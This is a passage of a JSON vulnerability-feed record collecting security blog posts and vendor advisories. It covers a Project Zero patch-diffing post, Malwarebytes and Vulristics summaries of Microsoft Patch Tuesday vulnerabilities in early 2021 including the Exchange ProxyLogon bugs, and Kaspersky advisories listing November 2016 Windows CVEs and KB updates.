started. In addition, I think this was a fun and quite interesting bug!\n\n** \n**\n\nI didn\u2019t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "modified": "2020-04-02T00:00:00", "published": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-02-13T13:09:08", "bulletinFamily": "blog", "cvelist": ["CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24094", "CVE-2021-26701"], "description": "Traditionally the second Tuesday of the month is Microsoft\u2019s \u201cpatch Tuesday\u201d. This is the day when they roll out all the available patches for their software, and their operating systems in particular.\n\nSince there were no less than 56 patches in this month\u2019s issue we will focus on the most important ones. Not that 56 is an awful lot. There were [more than 80 in January](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>).\n\n### Microsoft CVEs by importance\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The most notable CVE\u2019s in this update were:\n\n * [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) Windows Win32k elevation of privilege (EoP) vulnerability. This one we listed first as it\u2019s actively exploited in the wild. With a EoP vulnerability attackers can raise their authorization permissions beyond those initially granted. For example, if an attacker gains access to a system but only has read-only permissions they can use an EoP vulnerability to raise them to \u201cread and write\u201d, giving them an option to make unwanted changes.\n * [CVE-2021-26701](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26701>) a .NET Core Remote Code Execution (RCE) vulnerability. A remote code execution (RCE) attack happens when a threat actor illegally accesses and manipulates a computer or server without authorization from its owner. This is the only critical bug Microsoft listed as publicly known.\n * [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) an IPv4 security vulnerability concerning source routing behavior. Microsoft adds to say: IPv4 Source routing is considered insecure and is blocked by default in Windows; however, a system will process the request and return an ICMP message denying the request.\n * [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) an IPv6 security vulnerability concerning the reassembly limit and related to the previous one. The reassembly limit controls the IP fragmentation, which is an Internet Protocol (IP) process that breaks packets into smaller fragments, so that the resulting pieces can pass through a link with a smaller maximum transmission unit (MTU) than the original packet size. The fragments are reassembled by the receiving host. Apparently an attacker could construe packets leading to a situation where a large number of fragments could lead to code execution.\n * [CVE-2021-1721](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1721>) a .NET Core and Visual Studio Denial of Service vulnerability. A Denial of Service attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed.\n * [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) are both Windows Fax Service RCE problems. It&#x27;s important to remember that even if you don\u2019t use \u201cWindows Fax and Scan\u201d, the Windows Fax Services is enabled by default.\n * [CVE-2021-1733](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1733>) is for Sysinternals\u2019 PsExec Elevation of Privilege vulnerability. While this one is listed as not likely to be exploited, the tool itself is worth keeping an eye on, because it&#x27;s so popular with cybercriminals. They like it because, as a legitimate administration tool, it isn&#x27;t normally detected as malicious software by default.\n\nIf you are all about prioritizing your updates, these are the ones that we recommend doing first. Everyone else is advised to install the updates at their earliest convenience.\n\nOne other notable thing is the default enabling of the Domain Controller enforcement mode. This was done to counter the effects of the ZeroLogon vulnerability which is being exploited in the wild. We already covered the full story of [ZeroLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/the-story-of-zerologon/>) where this change was announced.\n\n### Adobe Reader for a change\n\nAnd while you are about to start your update cycles, you may want to have a look at this one from Adobe. Because this one is already actively being exploited as well. Where Adobe was notoriously famous for the bugs in their Flash Player, which has now reached [end-of-life](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>), occasionally a vulnerability in their Reader attracts some attention.\n\n[CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21017>) is a critical heap-based buffer overflow flaw. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n\nSo, by creating a specially crafted input, attackers could use this vulnerability to write code into a memory location where they normally wouldn\u2019t have access. In their advisory Adobe states that it has received a report that CVE-2021-21017 has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\n\nBoth Adobe Acrobat and Adobe Reader will automatically detect if a new version of the software is available. The program will check for a new version when you launch either Acrobat or Reader as an application and will prompt you to install a new version when it&#x27;s available. IT administrators can control the update settings by using the [Adobe Customization Wizard](<https://www.adobe.com/nl/devnet-docs/acrobatetk/tools/Wizard/WizardDC/index.html>).\n\nStay safe, everyone!\n\nThe post [Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits](<https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-02-10T17:26:33", "published": "2021-02-10T17:26:33", "id": "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/", "type": "malwarebytes", "title": "Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-03-26T00:33:35", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0986", "CVE-2020-1350", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1664", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1698", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1730", "CVE-2021-1732", "CVE-2021-24074", "CVE-2021-24078", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26891", "CVE-2021-27065"], "description": "Hello everyone! It has been 3 months since [my last review of Microsoft vulnerabilities for Q4 2020](<https://avleonov.com/2021/01/11/vulristics-vulnerability-score-automated-data-collection-and-microsoft-patch-tuesdays-q4-2020/>). In this episode I want to review the Microsoft vulnerabilities for the first quarter of 2021. There will be 4 parts: January, February, March and the vulnerabilities that were released between the Patch Tuesdays.\n\n\n\nI will be using the reports that I created with my [Vulristics tool](<https://github.com/leonov-av/vulristics>). This time I&#x27;ll try to make the episodes shorter. I will describe only the most critical vulnerabilities. Links to the full reports are at the bottom of the blog post.\n\n## January 2021\n\n * All vulnerabilities: 83\n * Urgent: 0\n * Critical: 1\n * High: 28\n * Medium: 51\n * Low: 3\n\nSo, what was interesting in January. The only critical vulnerability was Microsoft Defender Remote Code Execution (CVE-2021-1647). &quot;Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.&quot;\n\nThe most interesting High level vulnerability is Microsoft splwow64 Elevation of Privilege (CVE-2021-1648). &quot;According to Maddie Stone, a researcher at Google Project Zero credited with identifying this vulnerability, CVE-2021-1648 is a patch bypass for CVE-2020-0986, which was exploited in the wild as a zero-day.&quot;\n\nAlso, vendors paid attention to a large number of Remote Procedure Call Runtime Remote Code Executions (CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701) and Windows Remote Desktop Security Feature Bypass (CVE-2021-1669). But there are still no signs of exploitation for them. They are all labeled High in the Vulristics report.\n\nThere were no public exploits for any of the January vulnerabilities. January was a quiet and calm month.\n\n## February 2021\n\n * All vulnerabilities: 57\n * Urgent: 1\n * Critical: 2\n * High: 21\n * Medium: 31\n * Low: 2\n\nOne Urgent level vulnerability is Elevation of Privilege in Win32k component of Windows 10 and Windows Server 2019 (CVE-2021-1732). According to Microsoft, this vulnerability has been exploited in the wild. &quot;Successful exploitation would elevate the privileges of an attacker, potentially allowing them to create new accounts, install programs, and view, modify or delete data&quot;. Public exploit in a form of Metasploit Module is found at Vulners ([Win32k ConsoleControl Offset Confusion](<https://vulners.com/packetstorm/packetstorm:161880>)).\n\nBut the situation with other critical vulnerabilities is interesting. None of the VM vendors mentioned them in their Patch Tuesday reviews.\n\n * This is Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-24085), which is mentioned on [AttackerKB](<https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085>) and for which public exploit is found at Vulners ([Microsoft Exchange Server msExchEcpCanary CSRF / Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161528>)). This is not the same vulnerability that was exploited in HAFNIUM. We&#x27;ll get to those vulnerabilities later.\n * Two other vulnerabilities, Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1698) and Microsoft Exchange Server (CVE-2021-1730), were exploitated in the wild. Therefore, the Vulristics Vulnerability Score is higher for them.\n\nIf vendors ignored these vulnerabilities, what vulnerabilities did they mention in their reports? \n\n * Primarily they wrote about Windows TCP/IP Remote Code Execution Vulnerabilities. &quot;Microsoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact.&quot;\n * Also about Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-24078). &quot;RCE flaw within Windows server installations when configured as a DNS server. Affecting Windows Server versions from 2008 to 2019, including server core installations, this severe flaw is considered \u201cmore likely\u201d to be exploited and received a CVSSv3 score of 9.8. This bug is exploitable by a remote attacker with no requirements for user interaction or a privileged account. As the vulnerability affects DNS servers, it is possible this flaw could be wormable and spread within a network.&quot;\n\nBut for these 2 vulnerabilities, there are still no public exploits or signs of active exploitation in the wild. This, of course, does not mean that these vulnerabilities do not need to be fixed. When we see the exploitation of these vulnerabilities the wild, it will be a disaster.\n\n## March 2021\n\n * All vulnerabilities: 82\n * Urgent: 0\n * Critical: 0\n * High: 36\n * Medium: 43\n * Low: 3\n\nAnd again, we see in the top not exactly the same vulnerabilities that VM vendors pointed out in their reviews.\n\n * Windows Container Execution Agent Elevation of Privilege Vulnerability (CVE-2021-26891). Just because a public exploit was found at Vulners ([Microsoft Windows Containers Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161734>)). \n * Internet Explorer Memory Corruption (CVE-2021-26411). &quot;A memory corruption vulnerability in Internet Explorer that was exploited in the wild as a zero-day. In order to exploit the flaw, an attacker would need to host the exploit code on a malicious website and convince a user through social engineering tactics to visit the page, or the attacker could inject the malicious payload into a legitimate website&quot;. Exploitation in the wild is mentioned at [AttackerKB](<https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411>).\n\nBut we also see several Windows DNS Server Remote Code Executions . &quot;All five of these CVEs were assigned 9.8 CVSSv3 scores and can be exploited by an unauthenticated attacker when dynamic updates are enabled. According to an analysis by researchers at McAfee, these CVEs are not considered \u201cwormable,\u201d yet they do evoke memories of CVE-2020-1350 (SIGRed), a 17-year-old wormable flaw patched in July 2020.&quot; In general, updating DNS Server is never a bad thing.\n\nAnd where is the most important thing? Naturally these are Exchange vulnerabilities and they were published between Patch Tuesdays. I made a special script to get such CVEs.\n\n## Other Q1 2021\n\n * All vulnerabilities: 85\n * Urgent: 0\n * Critical: 7\n * High: 5\n * Medium: 27\n * Low: 46\n\nThe 7 critical vulnerabilities are those Microsoft Exchange Server Remote Code Executions exploited in recent attacks. They have signs of exploitation in the wild at [AttackerKB](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855>) and [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). However, we still don&#x27;t see public exploits.\n\n&quot;[ProxyLogon](<https://proxylogon.com/>) is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution. All affected components are vulnerable by default! As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an only opened 443 port!&quot;\n\nEverything is extremely serious with these vulnerabilities and if you have public unpatched Exchange servers, then there is a good chance that you have already been hacked. For example, by HAFNIUM.\n\n&quot;Hafnium is a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC)&quot;.\n\n&quot;Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we\u2019ve seen use these exploits, which are discussed in detail [by MSTIC here](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what\u2019s called a web shell to control the compromised server remotely. Third, it would use that remote access \u2013 run from the U.S.-based private servers \u2013 to steal data from an organization\u2019s network.&quot;\n\nIn short, these Exchange vulnerabilities are the top.\n\nThe rest are Chrome vulnerabilities, simply because Microsoft&#x27;s browser is now based on Chrome.\n\nYou can download full versions of reports here:\n\n * [ms_patch_tuesday_january2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_january2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_february2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_february2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_march2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_march2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_other_Q1_2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_other_Q1_2021_report_avleonov_comments.html>)\n", "modified": "2021-03-26T02:47:52", "published": "2021-03-26T02:47:52", "id": "AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "href": "http://feedproxy.google.com/~r/avleonov/~3/poQoyaBweKg/", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q1 2021", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:48:11", "bulletinFamily": "info", "cvelist": ["CVE-2016-7221", "CVE-2016-7239", "CVE-2016-7195", "CVE-2016-7184", "CVE-2016-3338", "CVE-2016-3334", "CVE-2016-7216", "CVE-2016-7227", "CVE-2016-7237", "CVE-2016-7246", "CVE-2016-7248", "CVE-2016-7199", "CVE-2016-3335", "CVE-2016-7218", "CVE-2016-7210", "CVE-2016-7214", "CVE-2016-3343", "CVE-2016-3333", "CVE-2016-7202", "CVE-2016-0026", "CVE-2016-7198", "CVE-2016-7205", "CVE-2016-7256", "CVE-2016-7238", "CVE-2016-3332", "CVE-2016-7255", "CVE-2016-3342", "CVE-2016-7215", "CVE-2016-7212", "CVE-2016-3340"], "description": "### *Detect date*:\n11/08/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Vista Service Pack 2 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nMicrosoft Windows Hyperlink Object Library \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nInternet Explorer 10 \nInternet Explorer 11 \nWindows Vista x64 Edition Service Pack 2 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nMicrosoft Edge (EdgeHTML-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-7216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7216>) \n[CVE-2016-7214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7214>) \n[CVE-2016-7215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7215>) \n[CVE-2016-7212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7212>) \n[CVE-2016-7210](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7210>) \n[CVE-2016-7218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7218>) \n[CVE-2016-3340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3340>) \n[CVE-2016-3342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3342>) \n[CVE-2016-3343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3343>) \n[CVE-2016-7195](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7195>) \n[CVE-2016-7248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7248>) \n[CVE-2016-7199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7199>) \n[CVE-2016-7198](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7198>) \n[CVE-2016-7246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7246>) \n[CVE-2016-7205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7205>) \n[CVE-2016-7221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7221>) \n[CVE-2016-7227](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7227>) \n[CVE-2016-7202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7202>) \n[CVE-2016-3333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3333>) \n[CVE-2016-3332](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3332>) \n[CVE-2016-3335](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3335>) \n[CVE-2016-3334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3334>) \n[CVE-2016-3338](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3338>) \n[CVE-2016-0026](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0026>) \n[CVE-2016-7184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7184>) \n[CVE-2016-7238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7238>) \n[CVE-2016-7239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7239>) \n[CVE-2016-7237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7237>) \n[CVE-2016-7256](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7256>) \n[CVE-2016-7255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7255>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2016-7239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7239>)0.0Unknown \n[CVE-2016-7227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7227>)0.0Unknown \n[CVE-2016-7195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7195>)0.0Unknown \n[CVE-2016-7198](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7198>)0.0Unknown \n[CVE-2016-7199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7199>)0.0Unknown \n[CVE-2016-7202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202>)0.0Unknown \n[CVE-2016-7256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256>)0.0Unknown \n[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>)0.0Unknown \n[CVE-2016-7248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7248>)0.0Unknown \n[CVE-2016-7246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7246>)0.0Unknown \n[CVE-2016-7238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7238>)0.0Unknown \n[CVE-2016-7237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7237>)0.0Unknown \n[CVE-2016-0026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0026>)0.0Unknown \n[CVE-2016-3332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3332>)0.0Unknown \n[CVE-2016-3333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3333>)0.0Unknown \n[CVE-2016-3334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3334>)0.0Unknown \n[CVE-2016-3335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3335>)0.0Unknown \n[CVE-2016-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3338>)0.0Unknown \n[CVE-2016-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3340>)0.0Unknown \n[CVE-2016-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3342>)0.0Unknown \n[CVE-2016-3343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3343>)0.0Unknown \n[CVE-2016-7184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7184>)0.0Unknown \n[CVE-2016-7205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205>)0.0Unknown \n[CVE-2016-7210](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7210>)0.0Unknown \n[CVE-2016-7212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7212>)0.0Unknown \n[CVE-2016-7214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7214>)0.0Unknown \n[CVE-2016-7215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7215>)0.0Unknown \n[CVE-2016-7216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7216>)0.0Unknown \n[CVE-2016-7218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7218>)0.0Unknown \n[CVE-2016-7221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7221>)0.0Unknown\n\n### *KB list*:\n[3181707](<http://support.microsoft.com/kb/3181707>) \n[3193418](<http://support.microsoft.com/kb/3193418>) \n[3194371](<http://support.microsoft.com/kb/3194371>) \n[3196718](<http://support.microsoft.com/kb/3196718>) \n[3197867](<http://support.microsoft.com/kb/3197867>) \n[3197868](<http://support.microsoft.com/kb/3197868>) \n[3198234](<http://support.microsoft.com/kb/3198234>) \n[3198483](<http://support.microsoft.com/kb/3198483>) \n[3198510](<http://support.microsoft.com/kb/3198510>) \n[3203859](<http://support.microsoft.com/kb/3203859>) \n[3197655](<http://support.microsoft.com/kb/3197655>) \n[3203621](<http://support.microsoft.com/kb/3203621>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2016-11-08T00:00:00", "id": "KLA11832", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11832", "title": "\r KLA11832Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2016-7221", "CVE-2016-7184", "CVE-2016-3338", "CVE-2016-3334", "CVE-2016-7216", "CVE-2016-7237", "CVE-2016-7246", "CVE-2016-7248", "CVE-2016-3335", "CVE-2016-7218", "CVE-2016-7217", "CVE-2016-7247", "CVE-2016-7210", "CVE-2016-7214", "CVE-2016-3343", "CVE-2016-3333", "CVE-2016-7202", "CVE-2016-7223", "CVE-2016-7225", "CVE-2016-0026", "CVE-2016-7205", "CVE-2016-7256", "CVE-2016-7222", "CVE-2016-7238", "CVE-2016-3332", "CVE-2016-7224", "CVE-2016-7226", "CVE-2016-7255", "CVE-2016-3342", "CVE-2016-7215", "CVE-2016-7220", "CVE-2016-7212", "CVE-2016-3340"], "description": "### *Detect date*:\n11/08/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service, obtain sensitive information.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Vista Service Pack 2 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nMicrosoft Windows Hyperlink Object Library \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Vista x64 Edition Service Pack 2 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-7202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7202>) \n[CVE-2016-7256](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7256>) \n[CVE-2016-7255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7255>) \n[CVE-2016-7248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7248>) \n[CVE-2016-7247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7247>) \n[CVE-2016-7246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7246>) \n[CVE-2016-7238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7238>) \n[CVE-2016-7237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7237>) \n[CVE-2016-0026](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0026>) 